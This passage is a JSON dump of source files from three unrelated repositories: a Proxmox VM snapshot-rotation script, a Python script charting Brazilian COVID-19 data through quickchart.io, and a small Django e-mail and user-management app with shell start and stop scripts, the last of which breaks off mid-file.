[ { "alpha_fraction": 0.5888888835906982, "alphanum_fraction": 0.6333333253860474, "avg_line_length": 44, "blob_id": "472d9be14116f2d4e7dba81d44ad9728b0883b93", "content_id": "cd63a8499482ae6a97921bb8f80e3b737e12f63f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 90, "license_type": "no_license", "max_line_length": 77, "num_lines": 2, "path": "/trimsnapshots.sh", "repo_name": "dbca-wa/proxmox-utils", "src_encoding": "UTF-8", "text": "#!/bin/bash\nqm listsnapshot $1 | cut -f1 -d' ' | grep auto | xargs -n 1 qm delsnapshot $1\n" }, { "alpha_fraction": 0.5677808523178101, "alphanum_fraction": 0.5733519196510315, "avg_line_length": 50.238094329833984, "blob_id": "fb863950d1420e5178300d254f995621ccd8537c", "content_id": "79d64ac25ca711eef2b05a055de32ec7a64fa2b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2154, "license_type": "no_license", "max_line_length": 125, "num_lines": 42, "path": "/snapshotvms", "repo_name": "dbca-wa/proxmox-utils", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport subprocess\nfrom datetime import datetime, timedelta\nfrom collections import namedtuple\n\n# Copy to /etc/cron.daily/snapshotvms on a proxmox cluster node\n# Needs to be run on a cluster, goes through each node and snapshots vms\nnodes = [row.split()[2] for row in subprocess.check_output([\"pvecm\", \"nodes\"]).decode(\"utf-8\").strip().split(\"\\n\")[3:]]\n\nfor node in nodes:\n vms = subprocess.check_output([\"ssh\", node, \"qm\", \"list\"]).decode(\"utf-8\").strip().split(\"\\n\")\n VMInfo = namedtuple(\"vminfo\", vms[0].strip().replace(\"(\", \"_\").replace(\")\", \"\").split())\n Snap = namedtuple(\"Snap\", [\"name\", \"parent\", \"desc\"])\n # date followed by 24hr time, with minutes truncated to disallow multiple snaps per hour\n timeformat = \"auto_%Y%m%d\" \n now = datetime.now()\n maxage = timedelta(days=7)\n\n for vm in vms[1:]:\n vm = VMInfo(*vm.strip().split())\n if vm.STATUS == \"running\":\n try:\n subprocess.check_call([\"ssh\", node, \"qm\", \"snapshot\", vm.VMID, now.strftime(timeformat)])\n except Exception as e:\n print(e)\n snapshots = subprocess.check_output([\"ssh\", node, \"qm\", \"listsnapshot\", vm.VMID]).decode(\"utf-8\").strip().split(\"\\n\")\n if snapshots and len(snapshots) > 1:\n snapshots.sort()\n for snap in snapshots:\n snap = Snap(*snap.strip().split()) \n try: snapdate = datetime.strptime(snap.name, timeformat)\n except Exception as e:\n print(e)\n continue # If name doesn't parse, it wasn't an automated snapshot, so just skip to next\n if now - snapdate > maxage: # delete snapshots older than maxage\n try:\n print(\"Deleting snapshot {}@{}\".format(vm.VMID, snap.name))\n subprocess.check_call([\"ssh\", node, \"qm\", \"delsnapshot\", vm.VMID, snap.name])\n except Exception as e:\n print(e)\n print(\"{} ({}) snapshots:\".format(vm.NAME, vm.VMID))\n subprocess.check_call([\"ssh\", node, \"qm\", \"listsnapshot\", vm.VMID])\n\n\n" } ]
2
Viviansol/python-api
https://github.com/Viviansol/python-api
3680746b6fa426533448af8794a034e56962c738
0b5853034d64047ac3e99ab991fa63369051ed1e
0a5d28f4b7f3117d7d978ccab6fa53c3b8005a51
refs/heads/main
2023-07-17T20:42:22.200553
2021-08-23T18:53:32
2021-08-23T18:53:32
399,215,769
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5315614342689514, "alphanum_fraction": 0.5652951598167419, "avg_line_length": 12.715789794921875, "blob_id": "b84ba88669f65846bd150d04fe859889614d7ef4", "content_id": "c6b9b93fcf61571772dcbf5cb8271571715583c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3916, "license_type": "no_license", "max_line_length": 102, "num_lines": 285, "path": "/projeto-final.py", "repo_name": "Viviansol/python-api", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# projeto final\n\n\n# In[24]:\n\n\nimport requests as r\n\n\n# In[25]:\n\n\nurl = 'https://api.covid19api.com/dayone/country/brazil'\nresp = r.get(url)\n\n\n# In[26]:\n\n\nresp.status_code\n\n\n# In[27]:\n\n\nraw_data = resp.json()\n\n\n# In[28]:\n\n\nraw_data[0]\n\n\n# In[29]:\n\n\nfinal_data = []\nfor obs in raw_data:\n final_data.append([obs['Confirmed'], obs['Deaths'], obs['Recovered'], obs['Active'], obs['Date']])\n\n\n# In[30]:\n\n\nfinal_data\n\n\n# In[31]:\n\n\nfinal_data.insert(0, ['Confirmados', 'Obitos', 'recuperados', 'Ativos', 'data'])\n\n\n# In[32]:\n\n\nfinal_data\n\n\n# In[33]:\n\n\nCONFIRMADOS = 0\nOBITOS = 1\nRECUPERADOS = 2\nATIVOS = 3\nDATA = 4\n\n\n# In[34]:\n\n\nfor i in range(1, len(final_data)):\n final_data[i][DATA] = final_data[i][DATA][:10] \n\n\n# In[35]:\n\n\nfinal_data\n\n\n# In[36]:\n\n\nimport datetime as dt\n\n\n# In[37]:\n\n\nprint(dt.time(12, 6, 21, 7), 'Hora:minuto:segundo.microsegundo')\nprint('----')\nprint(dt.date(2020, 4, 25), 'Ano-mês-dia')\nprint('----')\nprint(dt.datetime(2020, 4, 25, 12, 6, 21, 7), 'Anoe-mês-dia Hora:minuto:segundo.microsegundo')\n\n\n# In[38]:\n\n\nnatal = dt.date(2020, 12, 25)\nreveillon =dt.date(2021, 1, 1)\n\nprint(reveillon - natal)\nprint((reveillon - natal).days)\nprint((reveillon - natal).seconds)\nprint((reveillon - natal). microseconds)\n\n\n# In[39]:\n\n\nimport csv\n\n\n# In[40]:\n\n\nwith open('brasil-covid.csv', 'w') as file:\n writer = csv.writer(file)\n writer.writerows(final_data)\n\n\n# In[41]:\n\n\nfor i in range(1, len(final_data)):\n final_data[i][DATA] = dt.datetime.strptime(final_data[i][DATA], '%Y-%m-%d')\n\n\n# In[42]:\n\n\nfinal_data\n\n\n# In[43]:\n\n\ndef get_datasets(y, labels):\n if type(y[0])== list:\n datasets = []\n for i in range(len(y)):\n datasets.append({\n 'label': labels[i],\n 'data': y[i]\n })\n return datasets\n else:\n return [\n {\n 'label': labels[0],\n 'data': y\n }\n ]\n \n\n\n# In[44]:\n\n\ndef set_title(title= ' '):\n if title != ' ':\n display = 'true'\n else:\n display = 'false'\n return{\n 'title': title,\n 'display': display\n }\n\n\n# In[70]:\n\n\ndef create_chart(x, y, labels, kind= 'bar', title= ''):\n \n datasets = get_datasets(y, labels)\n options = set_title(title)\n \n chart = {\n 'type': kind,\n 'data':{\n 'labels': x,\n 'datasets': datasets\n },\n 'options': options\n }\n \n return chart\n\n\n# In[71]:\n\n\ndef get_api_chart(chart):\n url_base = 'https://quickchart.io/chart'\n resp = r.get(f'{url_base}?c={str(chart)}')\n return resp.content\n\n\n# In[78]:\n\n\ndef save_image(path, content):\n with open(path, 'wb') as image:\n image.write(content)\n\n\n# In[79]:\n\n\nfrom PIL import Image\n\nfrom IPython.display import display\n\n\n# In[80]:\n\n\ndef display_image(path):\n img_pil = Image.open(path)\n display(img_pil)\n\n\n# In[81]:\n\n\n\ny_data_1 = []\nfor obs in final_data[1::10]:\n y_data_1.append(obs[CONFIRMADOS])\n \ny_data_2 = []\nfor obs in final_data[1::10]:\n y_data_2.append(obs[RECUPERADOS])\n \nlabels = ['Confirmados', 'Recuperados']\n\nx = []\nfor obs in final_data[1::10]:\n x.append(obs[DATA].strftime('%d/%m/%Y'))\n \nchart = create_chart(x, [y_data_1, y_data_2], labels, title='Gráfico Confirmados x Recuperados')\nchart_content = get_api_chart(chart)\nsave_image('meu-primeiro-grafico.png', chart_content)\n\ndisplay_image('meu-primeiro-grafico.png')\n \n\n\n# In[88]:\n\n\nfrom urllib.parse import quote\n\n\n# In[89]:\n\n\ndef get_api_qrcode(link):\n text = quote(link) # parsing do link para url\n url_base = 'https://quickchart.io/qr'\n resp = r.get(f'{url_base}?text={text}')\n return resp.content\n\n\n# In[90]:\n\n\nurl_base = 'https://quickchart.io/chart'\nlink = f'{url_base}?c={str(chart)}'\nsave_image('qr-code.png', get_api_qrcode(link))\ndisplay_image('qr-code.png')\n\n\n# In[ ]:\n\n\n\n\n" } ]
1
LarryMasc/lankinc
https://github.com/LarryMasc/lankinc
f7f364e799ec7bb984cf227bb7fc2936f5196c1b
29b2f785d9cc62a53598958d17735075aa300d7e
278677c634bcfe3f93755174cec21b9638b79b4d
refs/heads/master
2020-04-13T06:21:13.281551
2019-04-14T21:03:39
2019-04-14T21:03:39
163,017,951
0
1
null
2018-12-24T19:14:05
2018-12-30T21:24:05
2019-04-14T21:03:40
JavaScript
[ { "alpha_fraction": 0.7342657446861267, "alphanum_fraction": 0.7342657446861267, "avg_line_length": 19.428571701049805, "blob_id": "e7fa56668f6d63376b630ac09b23b9f5d301ed3b", "content_id": "a2e7efae2e8247ec76fae2a6cc09169312ce523c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 143, "license_type": "no_license", "max_line_length": 44, "num_lines": 7, "path": "/django/core/filters.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "import django_filters\n\nfrom .models import email_data\n\nclass EmailFilter(django_filters.Filterset):\n class Meta:\n model = email_data\n" }, { "alpha_fraction": 0.6566383242607117, "alphanum_fraction": 0.6566383242607117, "avg_line_length": 50, "blob_id": "cb92eb9eb6617d923c0bbdbe470a78169c0ada0c", "content_id": "f18d2da3d4f8f8e046a3a0a1d6eeddfb007f5b36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1529, "license_type": "no_license", "max_line_length": 100, "num_lines": 30, "path": "/django/core/urls.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "from django.urls import path\n\n# from . import views\nfrom .views import core_view, email_create, email_delete, email_detail,EmailFilter, \\\n email_update, home_view, home_view_core, pic_gallery, send_email_msg, send_msg, show_all_email,\\\n show_all_users, signup, sign_up, view_sent_email\n\nfrom django_filters.views import FilterView\n\napp_name = 'core'\n\nurlpatterns = [\n path('core/', core_view.as_view()),\n path('core/pics/', pic_gallery.as_view()),\n path('core/send_msg/', send_msg, name='send_email_msg'),\n path('core/send_email_msg/', send_email_msg.as_view(), name='send_email_msg'),\n path('core/signup/', signup, name='signup'),\n path('core/view_sent_email/', view_sent_email),\n path('core/sign_up/', sign_up.as_view(), name='sign_up'),\n path('core/show_all_email/', show_all_email.as_view(), name=\"show_all_email\"),\n path('core/show_all_users/', show_all_users.as_view(), name=\"show_all_users\"),\n # path('core/<int:pk>/', email_detail.as_view(), name=\"email_detail\"),\n path('core/<int:id>/', email_detail.as_view(), name=\"email_detail\"),\n path('core/<int:id>/update/', email_update.as_view(), name=\"email_update\"),\n path('core/<int:id>/delete/', email_delete.as_view(), name=\"email_delete\"),\n path('core/create_email/', email_create.as_view(), name=\"email_create\"),\n path('core/home/', home_view_core.as_view(), name='core_home'),\n path('core/search/', FilterView.as_view(filterset_class=EmailFilter), name='search'),\n path('', home_view.as_view(), name='app_home'),\n]" }, { "alpha_fraction": 0.39878949522972107, "alphanum_fraction": 0.40147948265075684, "avg_line_length": 37.128204345703125, "blob_id": "4dc01365b826605bdcf6d4746ec7757fd0153966", "content_id": "99a9a0fbb13ad3683672bc38142ee37c71d5f535", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1487, "license_type": "no_license", "max_line_length": 83, "num_lines": 39, "path": "/django/core/forms.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "from django import forms\n\nfrom .models import email_data\n\n\nclass send_msg_form(forms.ModelForm):\n sender = forms.EmailField(label=\"Sender\", widget=forms.TextInput(\n attrs={\n \"placeholder\": \"[email protected]\",\n }\n ))\n class Meta:\n model = email_data\n fields = [\n 'sender',\n 'recipient',\n 'subject',\n 'body',\n 'cc_myself',\n ]\n def clean_sender(self, *args, **kwargs):\n sender = self.cleaned_data.get(\"sender\")\n # if not \"[email protected]\" in sender:\n # raise forms.ValidationError(\"Sender can only be [email protected]\")\n return sender\n\n# class send_msg_form(forms.Form):\n# sender = forms.EmailField(label=\"Sender\")\n# recipient = forms.EmailField(label=\"Recipient\")\n# subject = forms.CharField(label=\"Subject\")\n# body = forms.CharField(label=\"Message\",\n# widget=forms.Textarea(\n# attrs={\n# \"class\": \"new-class-name two\",\n# \"rows\": 24,\n# \"cols\": 80,\n# }\n# ))\n# cc_myself = forms.BooleanField(required=False)\n" }, { "alpha_fraction": 0.49975454807281494, "alphanum_fraction": 0.5355915427207947, "avg_line_length": 19.785715103149414, "blob_id": "7d8e913a9a80c14ba62fdd481ff322cb7b1a8486", "content_id": "784265dbac3b31e9fe279203a4705bfa68738392", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2037, "license_type": "no_license", "max_line_length": 75, "num_lines": 98, "path": "/rc.django", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nLOG=\"/u/logs/django_server_lankinc.log\"\n\nDJANGO_HOME=\"/u/gitwork/lankinc\"\nDJANGO_APP=\"${DJANGO_HOME}/django\"\n\naction=$1\n\necho \"Django Webserver has been moved to Apache\"\nexit 1\n# \ncheck_venv () {\n # If the VIRTUAL_ENV variable is not defined\n # then there is no VENV.\n if [[ -z \"${VIRTUAL_ENV}\" ]]\n then\n cd ${DJANGO_HOME}\n if [[ -d venv ]]\n then\n echo \"No Virtual ENV running. Activating..\"\n source venv/bin/activate\n cd\n else\n echo \"No Virtual Environment available...exiting..\"\n exit 1\n fi\n fi\n}\n\ndjango_state() {\n DJANGO_PID=`lsof -i :8008 | egrep TCP | awk '{print $2}'`\n if [[ \"${DJANGO_PID}\" != \"\" ]]\n then\n echo \"Django is running on PID --> ${DJANGO_PID}\"\n else\n echo \"Django Server is not running\"\n fi\n }\n\ndjango_start() {\n # set -x\n check_venv\n echo \"Starting Django Server on `date`\" | tee -a ${LOG}\n #nohup ./manage.py runserver 172.31.251.63:8008 >> ${LOG} 2>&1 &\n\n # Will start the server in the django/bookstore directory\n cd ${DJANGO_APP}\n if [[ -f manage.py ]]\n then\n # nohup ./manage.py runserver 172.31.251.63:8008 >> ${LOG} 2>&1 &\n # nohup python ./manage.py runserver 0.0.0.0:8008 1>>${LOG} 2>&1 &\n nohup ./manage.py runserver 0.0.0.0:8008 1>>${LOG} 2>&1 &\n sleep 5\n django_state\n else\n echo \"Not a valid DJANGO directory --> `pwd` <--. Exiting\"\n exit 1\n fi\n}\n\ndjango_stop() {\n echo \"Stopping django `date`\" | tee -a ${LOG}\n DJANGO_PID=`lsof -i :8008 | egrep TCP | awk '{print $2}'`\n if [[ \"${DJANGO_PID}\" != \"\" ]]\n then\n kill -15 ${DJANGO_PID}\n sleep 2\n fi\n django_state\n}\n\n# Main\n\ncase ${action} in\n\nstart) \n django_start\n ;;\n\nstop)\n django_stop\n ;;\n\nstatus)\n django_state\n ;;\n\nrestart)\n django_stop\n django_start\n ;;\n\n*)\n echo \"Usage : ./rc.django [start|stop|status]\"\n exit 1\n ;;\nesac\n" }, { "alpha_fraction": 0.4679029881954193, "alphanum_fraction": 0.4736091196537018, "avg_line_length": 32.380950927734375, "blob_id": "bbb8a4611b27343076238808878784fd1459eef2", "content_id": "766a3572d81061905b0cf6aee01a3a8fb249159e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 701, "license_type": "no_license", "max_line_length": 73, "num_lines": 21, "path": "/django/templates/index.html", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "{% extends 'base.html' %}\n\n{% block content %}\n {% if user.is_authenticated %}\n <h1>Hello {{ user.first_name }} {{ user.last_name }}!</h1>\n <p>Joining Date : {{ user.date_joined }}</p>\n <p>Last Logged in : {{ user.last_login }}</p>\n <p>Active User : {{ user.is_active }}</p>\n {% else %}\n <!--<p><a href=\"{% url 'core:signup' %}\">Core Sign Up</a> </p>-->\n <h3>Login</h3>\n <form method=\"post\">\n {% csrf_token %}\n {{ form.as_p }}\n <button type=\"submit\">Login</button>\n </form>\n <p><a href=\"{% url 'users:signup' %}\">Users Sign Up</a> </p>\n <p><a href=\"{% url 'login' %}\">Login</a> </p>\n {% endif %}\n\n{% endblock %}\n" }, { "alpha_fraction": 0.4375, "alphanum_fraction": 0.4375, "avg_line_length": 15, "blob_id": "b1a25c6f9b98aa5471ceb724bb6d3a2a8bd041ef", "content_id": "0742a02fd07e0af8bba16bdb2e6bad597a39b01a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 16, "license_type": "no_license", "max_line_length": 15, "num_lines": 1, "path": "/README.md", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "# L.A.N.K. Inc.\n" }, { "alpha_fraction": 0.629901647567749, "alphanum_fraction": 0.6322710514068604, "avg_line_length": 26.769737243652344, "blob_id": "af0f8b0fd202fec2d162029983fef9f12fb208cd", "content_id": "ab0ace5c5ebde6f0931d4c0acaf4c61a489997fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8441, "license_type": "no_license", "max_line_length": 81, "num_lines": 304, "path": "/django/core/views.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse\nfrom django.views.generic import (\n CreateView, DeleteView, DetailView, FormView, ListView, TemplateView,\n UpdateView, View\n )\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django.core.paginator import Paginator\nimport django_filters\n\nfrom .forms import send_msg_form\nfrom .models import email_data\n\nfrom users.models import CustomUser\n\n\"\"\"\nToDo\n - Filter to display all emails by ID ASC\n - Elastic Search Integration\n - Every item in the ListView should be selectable for\n - Update\n - Delete \n\n - Password Reset, Password Change\n\n - Confirm via e-mail\n - Social Media Registration\n\nComplete\n - Admin Extensions\n - Pagination\n - Picture Gallery\n - Login, Logout\n - Register\n\nReference\n - Unicode Symbols https://www.w3schools.com/charsets/ref_utf_punctuation.asp\n\"\"\"\n\n# All Class-based-views\nclass core_view(TemplateView):\n template_name = \"core/core_index.html\"\n\n\nclass home_view(TemplateView):\n template_name = \"index.html\"\n\n\nclass home_view_core(View):\n template_name = \"core/index.html\"\n def get(self, request, *args, **kwargs):\n count = CustomUser.objects.count()\n context = {\n 'count': count\n }\n return render(request, self.template_name, context)\n\n# class 123\n\n\nclass pic_gallery(TemplateView):\n template_name = \"core/picture_gallery.html\"\n\n\n# Signup forms\nclass sign_up(FormView):\n \"\"\"This class signs user into the DB.\"\"\"\n template_name = \"core/signup.html\"\n def get(self, request):\n form = UserCreationForm()\n context = {\n 'form': form\n }\n return render(request, self.template_name, context)\n\n\n def post(self, request, *args, **kwargs):\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return render(request, \"core/signup_successful.html\")\n\n\n# List all the sent e-mails\nclass show_all_users(ListView):\n r\"\"\"ListView using ClassView\n\n In a listview, the defaults are as followw\n template_name = <app>/<model>_<view>.html\n\n eg below shows how the class would be defined if the defaults are not\n used.\n\n class show_all_email(ListView)\n template_name = \"core/email_data_list.html\"\n def get(self, request):\n queryset = email_data.objects.all()\n context = {\n 'object_list': queryset\n }\n return render(request, self.template_name, context)\n \"\"\"\n # queryset = email_data.objects.all()\n # queryset = email_data.objects.order_by(\"-id\").filter(sender=\"[email protected]\")\n template_name = \"core/CustomUser_list.html\"\n\n def get(self, request, *args, **kwargs):\n queryset = CustomUser.objects.order_by(\"first_name\")\n paginate_by = 10\n count_users = CustomUser.objects.count()\n context = {\n 'queryset': queryset,\n 'paginate_by': paginate_by,\n 'count_users': count_users\n }\n print(context)\n return render(request, self.template_name, context)\n\n# Send email\nclass send_email_msg(FormView):\n \"\"\"This class will send emails and insert into the DB.\"\"\"\n template_name = \"core/send_msg.html\"\n def get(self, request, *args, **kwargs):\n form = send_msg_form() # No request.GET else form validation takes place.\n context = {\n 'form': form\n }\n return render(request, self.template_name, context)\n\n def post(self, request, *args, **kwargs):\n form = send_msg_form(request.POST)\n if form.is_valid():\n form.save()\n # return redirect('/')\n return render(request, 'core/send_msg_successful.html')\n\n\n# List all the sent e-mails\nclass show_all_email(ListView):\n r\"\"\"ListView using ClassView\n\n In a listview, the defaults are as followw\n template_name = <app>/<model>_<view>.html\n\n eg below shows how the class would be defined if the defaults are not\n used.\n\n class show_all_email(ListView)\n template_name = \"core/email_data_list.html\"\n def get(self, request):\n queryset = email_data.objects.all()\n context = {\n 'object_list': queryset\n }\n return render(request, self.template_name, context)\n \"\"\"\n # queryset = email_data.objects.all()\n # queryset = email_data.objects.order_by(\"-id\").filter(sender=\"[email protected]\")\n template_name = \"core/email_data_list.html\"\n queryset = email_data.objects.order_by(\"-id\")\n paginate_by = 10\n\n\n# Show details of a row\nclass email_detail(DetailView):\n r\"\"\"Display details of a row using Classviews.\n\n In a detailview, the defaults are as followw\n template_name = <app>/<model>_<view>.html\n\n eg below shows how the class would be defined if the defaults are not\n used.\n\n class email_detail(DetailView)\n template_name = \"core/email_data_detail.html\"\n def get(self, request):\n queryset = email_data.objects.all()\n context = {\n 'object_list': queryset\n }\n return render(request, self.template_name, context)\n \"\"\"\n # queryset = email_data.objects.all()\n template_name = \"core/email_data_detail.html\"\n def get_object(self, queryset=None):\n id_ = self.kwargs.get(\"id\")\n return get_object_or_404(email_data, id=id_)\n\n\n# Create view\nclass email_create(CreateView):\n r\"\"\"Example of CreateView using ClassViews.\n\n \"\"\"\n template_name = \"core/email_data_create.html\"\n form_class = send_msg_form\n queryset = email_data.objects.all()\n # success_url = \"/\"\n\n r\"\"\"Display details of the form in the server log.\"\"\"\n def form_valid(self, form):\n print(form.cleaned_data)\n return super().form_valid(form)\n\n # def get_success_url(self):\n # return \"/\"\n\n\n# Create view\nclass email_update(UpdateView):\n r\"\"\"Example of UpdateView using ClassViews.\n\n \"\"\"\n template_name = \"core/email_data_create.html\"\n form_class = send_msg_form\n # Not needed queryset = email_data.objects.all()\n\n def get_object(self, queryset=None):\n id_ = self.kwargs.get(\"id\")\n return get_object_or_404(email_data, id=id_)\n\n r\"\"\"Display details of the form in the server log.\"\"\"\n def form_valid(self, form):\n print(form.cleaned_data)\n return super().form_valid(form)\n\n\n# Delete a row\nclass email_delete(DeleteView):\n r\"\"\"Delete a row using Classviews.\"\"\"\n # queryset = email_data.objects.all()\n template_name = \"core/email_data_delete.html\"\n\n def get_object(self, queryset=None):\n id_ = self.kwargs.get(\"id\")\n return get_object_or_404(email_data, id=id_)\n\n def get_success_url(self):\n return reverse(\"core:show_all_email\")\n\n\nclass EmailFilter(django_filters.FilterSet):\n class Meta:\n model = email_data\n fields = ['sender', 'recipient', 'subject']\n\n\n\n\n# ALL Function-based-views below.\n# def send_msg(request):\n# form = send_msg_form(request.GET)\n# if request.method == \"POST\":\n# form = send_msg_form(request.POST)\n# if form.is_valid():\n# # form.save()\n# print(form.cleaned_data)\n# email_data.objects.create(**form.cleaned_data)\n# else:\n# print(form.errors)\n# context = {\n# 'form': form\n# }\n# return render(request, 'core/send_msg.html', context)\n\ndef home(request):\n count = User.objects.count()\n context = {\n 'count': count\n }\n return render(request, \"core/index.html\", context)\n\n# Display all signed-up users\ndef view_sent_email(request):\n template_name = \"core/email_data_list.html\"\n queryset = email_data.objects.all()\n context = {\n 'object_list': queryset\n }\n return render(request, template_name, context)\n\n\n# Function based view send_msg moved tp class based view send_email_msg\ndef send_msg(request):\n form = send_msg_form(request.POST or None)\n if form.is_valid():\n form.save()\n context = {\n 'form': form\n }\n return render(request, 'core/send_msg.html', context)\n\n\n# Function based view signup moved to class based view\ndef signup(request):\n form = UserCreationForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('/')\n context = {\n 'form': form\n }\n return render(request, \"core/signup.html\", context)" }, { "alpha_fraction": 0.6751677989959717, "alphanum_fraction": 0.6751677989959717, "avg_line_length": 31.39130401611328, "blob_id": "2483b47d2fbb4a859a9f0ad8db74acae898df488", "content_id": "f7ae4d22e00e05a762829f6b99edbe854525c1ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 745, "license_type": "no_license", "max_line_length": 68, "num_lines": 23, "path": "/django/core/admin.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\n\n# Register your models here.\n\n# The ModelAdmin class is not required if no custom values are\n# defined\nfrom .models import email_data\n\nclass ManageEmailData(admin.ModelAdmin):\n date_hierarchy = 'send_time'\n fields = ('sender', 'recipient', 'subject', 'send_time', 'body')\n list_display = ('sender', 'recipient', 'subject', 'send_time')\n list_display_links = ('sender', 'recipient', 'subject', )\n filter_horizontal = True\n list_filter = ('sender', 'recipient', 'send_time', 'cc_myself')\n save_on_top = True\n save_as = True\n search_fields = ['sender', 'recipient', 'subject' ]\n show_full_result_count = True\n view_on_site = True\n\nadmin.site.register(email_data, ManageEmailData)\n" }, { "alpha_fraction": 0.47948163747787476, "alphanum_fraction": 0.4881209433078766, "avg_line_length": 24.77777862548828, "blob_id": "e4c83b24189a3496beb377174875b694a0f32b7b", "content_id": "642eafdd2c45c8f09dbb70a61bfba0458a1484be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 463, "license_type": "no_license", "max_line_length": 71, "num_lines": 18, "path": "/django/core/templates/core/email_data_delete.html", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "{% extends \"base.html\" %}\n\n{% block content %}\n<form action=\".\" method=\"POST\">\n {% csrf_token %}\n <h3>Do you want to delete the following email :</h3>\n <pre>\n <h4>\n Sender : {{ object.sender }}\n Recipient : {{ object.sender }}\n Subject : {{ object.subject }}\n Body : {{ object.body }}\n </h4>\n <p><input type=\"submit\" value=\"Yes\" /> <a href=\"../\">Cancel</a>\n </p>\n </pre>\n</form>\n{% endblock %}" }, { "alpha_fraction": 0.6805292963981628, "alphanum_fraction": 0.6843100190162659, "avg_line_length": 36.82143020629883, "blob_id": "e9e91f1db9ea3178e08e110634d07e8a1a3d92cd", "content_id": "0e6c67554709f35ccc7dd74ea88b4fb9b484f741", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1058, "license_type": "no_license", "max_line_length": 75, "num_lines": 28, "path": "/django/core/models.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.utils.timezone import now\nfrom django.urls import reverse\n\n# Create your models here.\nclass email_data(models.Model):\n r\"\"\"DB table to store all e-mail communication.\n\n In this table I will store the followin\n sender -- Sender's email address\n receiver -- Receiver's email address\n subject -- Subject of the Message\n body -- Body of the message\n send_time -- Timestamp when the message was sent\n email_tag -- Tag used for this message. Can be used for email. threads\n id -- Primary Key field which will be Big-Auto\n \"\"\"\n sender = models.EmailField()\n recipient = models.EmailField()\n subject = models.CharField(max_length=70)\n body = models.TextField()\n send_time = models.DateTimeField(default=now, blank=True)\n cc_myself = models.BooleanField()\n email_tag = models.CharField(max_length=32)\n id = models.BigAutoField(primary_key=True)\n\n def get_absolute_url(self):\n return reverse(\"core:email_detail\", kwargs={\"id\": self.id})" }, { "alpha_fraction": 0.5346985459327698, "alphanum_fraction": 0.5631399154663086, "avg_line_length": 30.39285659790039, "blob_id": "98681127dd0d94925d538662a122cffde1eb59aa", "content_id": "8b00149cfd72ce84486a874f810262d5ceb91175", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 879, "license_type": "no_license", "max_line_length": 99, "num_lines": 28, "path": "/django/core/migrations/0001_initial.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.4 on 2018-12-25 17:02\n\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='email_data',\n fields=[\n ('sender', models.EmailField(max_length=254)),\n ('recipient', models.EmailField(max_length=254)),\n ('subject', models.CharField(max_length=70)),\n ('body', models.TextField()),\n ('send_time', models.DateTimeField(blank=True, default=django.utils.timezone.now)),\n ('cc_myself', models.BooleanField()),\n ('email_tag', models.CharField(max_length=32)),\n ('id', models.BigAutoField(primary_key=True, serialize=False)),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.5011876225471497, "alphanum_fraction": 0.5118764638900757, "avg_line_length": 14.592592239379883, "blob_id": "b5bae3a15f6c9486adaeba94f21dbfbc065dee4e", "content_id": "27e1d26ff3e2a4727ae8ad30641cade6c2747301", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 842, "license_type": "no_license", "max_line_length": 79, "num_lines": 54, "path": "/rc.apache", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [[ `pwd` = \"/u/gitwork/lank\" ]]\nthen\n echo \"LANK not ready for Apache yet\"\n exit 1\nfi\n\nID=`id -u`\nif [[ ${ID} -ne 0 ]]\nthen\n echo \"Please submit as root.\"\n exit 1\nfi\n\naction=$1\nAPACHE_HOME=\"/usr/local/apache2\"\ncd $APACHE_HOME/bin\n\nstatus(){\n APACHE_STATUS=`ps -aef|egrep /usr/local/apache2/bin/httpd | egrep -cv grep`\n if [[ ${APACHE_STATUS} -gt 0 ]]\n then\n echo \"Apache Server is running\"\n else\n echo \"Apache Server is down\"\n fi\n}\n\ncase ${action} in \n start)\n ./apachectl start\n status\n ;;\n\n stop)\n ./apachectl stop\n sleep 2\n status\n ;; \n\n restart)\n ./apachectl restart\n status\n ;;\n\n status)\n status\n 